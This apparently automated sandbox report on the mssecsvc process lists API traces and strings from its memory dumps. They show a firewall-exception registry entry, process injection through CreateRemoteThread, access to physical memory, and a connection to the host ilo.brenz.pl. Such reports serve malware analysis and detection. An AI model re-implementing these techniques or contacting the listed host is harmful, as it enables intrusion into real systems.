C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3D06, 00AA3D16, 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 215653160-1098094878
Opcode ID: 158a8434471a8ffb3d7ae248ffa9ddca1129267620db11f9b1b166f622603453
Instruction ID: ca90617d8153af452634bda31f07ae7e613f074072da4819399634f7ba9e6aad
Opcode Fuzzy Hash: 158a8434471a8ffb3d7ae248ffa9ddca1129267620db11f9b1b166f622603453
Instruction Fuzzy Hash: CBE1DE72418248BFEB259F248C4ABEA7BACEF42300F044559F9499F0C2D7F45F498BA5

Function 7FE43CF0 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE43CE5), ref: 7FE43CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE43D07

Part of subcall function 7FE43D1F: lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE43D12), ref: 7FE43D20
Part of subcall function 7FE43D1F: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D1F: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43D06, 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 215653160-1098094878
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: a575d1816f1fafdbe36b7d8d9a618c6fc80930f7c3831f5bc8b2ed9575ddbc2a
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: 23E1DF71509358BFEB229F209C0ABEA7BACEF42304F00655DFC4A9E081D6F46F459B65

Function 00AA3D1F Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#73204497e +*,00AA3D12), ref: 00AA3D20

Part of subcall function 00AA3D36: LoadLibraryA.KERNEL32(00AA3D2B), ref: 00AA3D36
Part of subcall function 00AA3D36: GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
Part of subcall function 00AA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
Part of subcall function 00AA3D36: GetTickCount.KERNEL32 ref: 00AA3D93
Part of subcall function 00AA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AA6EF6,00000000,00000000,00000000,00000000), ref: 00AA3E65

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3D1F, 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2038497427-1098094878
Opcode ID: 76485783ef1ebb789075038bc73b431c85142a4efb66d1d2d75da6d752c3c390
Instruction ID: e5463bfdef9abc0e1f22a856e8494b4a79e5c6d099ad5187e880a55d0dd8b02c
Opcode Fuzzy Hash: 76485783ef1ebb789075038bc73b431c85142a4efb66d1d2d75da6d752c3c390
Instruction Fuzzy Hash: C3E1CD72518258BFEB25AF248C4ABEA7BACEF42300F044559F8499F0C2D7F45F498765

Function 7FE43D1F Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE43D12), ref: 7FE43D20

Part of subcall function 7FE43D36: LoadLibraryA.KERNEL32(7FE43D2B), ref: 7FE43D36
Part of subcall function 7FE43D36: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D36: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43D1F, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2038497427-1098094878
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: 426a991c9d28a372a142f780a5599c1fe21c99d29c9374d1d361bc923b179bdc
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction Fuzzy Hash: 71E1ED71509358BFEB229F209C0ABEA7BACEF42304F00655DFC4A9E081D6F46F459B65

Function 00AA3D36 Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AA3D2B), ref: 00AA3D36

Part of subcall function 00AA3D4B: GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
Part of subcall function 00AA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
Part of subcall function 00AA3D4B: GetTickCount.KERNEL32 ref: 00AA3D93
Part of subcall function 00AA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AA6EF6,00000000,00000000,00000000,00000000), ref: 00AA3E65

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 3734769084-1098094878
Opcode ID: 6f01ac3ceebeb8875c516713d47fef36de49695922c4d05a487e9876f0f81099
Instruction ID: f54c0c34b96778167f479bd081aafba37f43a9c6fcaccb7a235f4b1dbeb493a5
Opcode Fuzzy Hash: 6f01ac3ceebeb8875c516713d47fef36de49695922c4d05a487e9876f0f81099
Instruction Fuzzy Hash: 4DD1CC72518248BEEF25AF648C0ABEA7BACEF42300F004559F8499F0C2D7F45F498B65

Function 7FE43D36 Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE43D2B), ref: 7FE43D36

Part of subcall function 7FE43D4B: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D4B: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 3734769084-1098094878
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: b6e5c684999b5124a360ce0b6569c1417190782f1e811f7b4d9ad18746e01973
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: 57D1DC71509358BFEB229F609C0ABEA7BACEF41304F00261DFC4A9E081D6F46F459B65

Function 00AA3D4B Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
GetTickCount.KERNEL32 ref: 00AA3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AA6EF6,00000000,00000000,00000000,00000000), ref: 00AA3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AA3EE2
wsprintfA.USER32 ref: 00AA3EF7
CreateThread.KERNEL32(00000000,00000000,00AA3691,00000000,00000000), ref: 00AA3F40
CloseHandle.KERNEL32(?,780B832E), ref: 00AA3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AA3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AA3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AA3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00AA4097
connect.WS2_32(6F6C6902,00AA3B09,00000010), ref: 00AA40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AA40FB
wsprintfA.USER32 ref: 00AA4179
SetEvent.KERNEL32(00000420,?,00000000), ref: 00AA42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 00AA42F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 00AA430A

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1567941233-1098094878
Opcode ID: 37f71bab4d2de818bdccc00d64875a05fb76d33de7a3105dbbaf66ef052a4c57
Instruction ID: 52081efc7000bdc2eae1fbbb5058f8ed54859e2d53be8657d897b7b273a42170
Opcode Fuzzy Hash: 37f71bab4d2de818bdccc00d64875a05fb76d33de7a3105dbbaf66ef052a4c57
Instruction Fuzzy Hash: EBE1CD72418248BEEF25AF248C0ABEA7BACEF46300F004659F9499F0C2D7F45F458765

Function 7FE43D4B Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
wsprintfA.USER32 ref: 7FE43EF7
CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
SetEvent.KERNEL32(00000420,?,00000000), ref: 7FE442D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE442F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 7FE4430A

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1567941233-1098094878
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: 0e4750c5ff84578107d1dc44a4ef0d59ba4f1e35034c124ccd42fec35a7c9163
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: 14E1DD71509358BEEB219F20AC0ABEA7BACEF41304F00265DFC4A9E081D6F46F45DB65

Function 7FE4042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE404BE
GetVersion.KERNEL32 ref: 7FE40500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FE40528
CloseHandle.KERNEL32(?), ref: 7FE405AD

Strings

\BaseNamedObjects\tputVt, xrefs: 7FE40709, 7FE4072C, 7FE4073A
csrs, xrefs: 7FE4082C
\BaseNamedObjects\tputVt, xrefs: 7FE40708

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 3017432202-3247437241
Opcode ID: f890454a24b3513c1b55c4f80a054a355f1c355fc5fef7395a7dd97704e0407a
Instruction ID: 9efcd029e5ff9f702e5d24ec4e940baa3aca8c5eca23fca7c65c58fce1734464
Opcode Fuzzy Hash: f890454a24b3513c1b55c4f80a054a355f1c355fc5fef7395a7dd97704e0407a
Instruction Fuzzy Hash: 26B1AB71506349FFEB229F64E809BEA3BA9EF45714F00112CFA0A9E580C7F49B458B59

Function 7FE405F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 7FE405AD
GetModuleHandleA.KERNEL32(7FE405EC), ref: 7FE405F2
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,\BaseNamedObjects\tputVt,?,?,?,?), ref: 7FE4070A
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,?), ref: 7FE4072D
lstrcatW.KERNEL32(\BaseNamedObjects\tputVt,\tputVt), ref: 7FE4073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FE4076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE40786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407C9
Process32First.KERNEL32 ref: 7FE407DC
Process32Next.KERNEL32 ref: 7FE407ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE40805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE40842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE4085D
CloseHandle.KERNEL32 ref: 7FE4086C

Strings

\BaseNamedObjects\tputVt, xrefs: 7FE40709, 7FE4072C, 7FE4073A
csrs, xrefs: 7FE4082C
\BaseNamedObjects\tputVt, xrefs: 7FE40708

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 1545766225-3247437241
Opcode ID: e7aba79f75a4323e5cb79a812cd71f4cf66a4d1f1c27252f97298980dbdbaa5f
Instruction ID: 92e33fe563f4ce631dd87b3f5722c0db0ec9cf3d935b64cf14b3b9bf1e8ed77e
Opcode Fuzzy Hash: e7aba79f75a4323e5cb79a812cd71f4cf66a4d1f1c27252f97298980dbdbaa5f
Instruction Fuzzy Hash: 0F718B31505205FFEB219E50EC49BBE3BBAEF49715F10102CFA0A9E490C7B59B059B99

Function 00AA4178 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AA4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AA4066
socket.WS2_32(00000002,00000001,00000000), ref: 00AA4097
connect.WS2_32(6F6C6902,00AA3B09,00000010), ref: 00AA40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AA40FB
wsprintfA.USER32 ref: 00AA4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AA41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AA6AA2,00000000,00000000), ref: 00AA41BD
GetTickCount.KERNEL32 ref: 00AA41F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00AA6AA2,00000000,00000000), ref: 00AA428B
GetTickCount.KERNEL32 ref: 00AA4294
closesocket.WS2_32(6F6C6902), ref: 00AA42B8
SetEvent.KERNEL32(00000420,?,00000000), ref: 00AA42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 00AA42F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 00AA430A

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
020a00 . . :#73204497e +*, xrefs: 00AA4178, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 883794535-1334317923
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 8be2a255f2ea7fca36e0c679d52afc48241636394c09832464ae79caeff96162
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 1E71BB71508258BAEF219F28881D7EEBBADAF8A310F140608F85A9F1C1C7F45F45D765

Function 7FE44178 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE4428B
GetTickCount.KERNEL32 ref: 7FE44294
closesocket.WS2_32(6F6C6902), ref: 7FE442B8
SetEvent.KERNEL32(00000420,?,00000000), ref: 7FE442D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE442F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 7FE4430A

Strings

020a00 . . :#73204497e +*, xrefs: 7FE44178, 7FE44195, 7FE441DB
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 883794535-1334317923
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: c034f442e2d8f513e2b327ea41ce5463e34186132653b9dadba1924edba9b606
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: AF71CF75608398BAEB219F3498187EEBFADEF81314F00260CEC5A9E181C7F46B41D755

Function 00AA33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AA344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AA3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AA3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AA34A0
UnmapViewOfFile.KERNEL32(?), ref: 00AA34B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3414
\Device\PhysicalMemory, xrefs: 00AA33E0

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

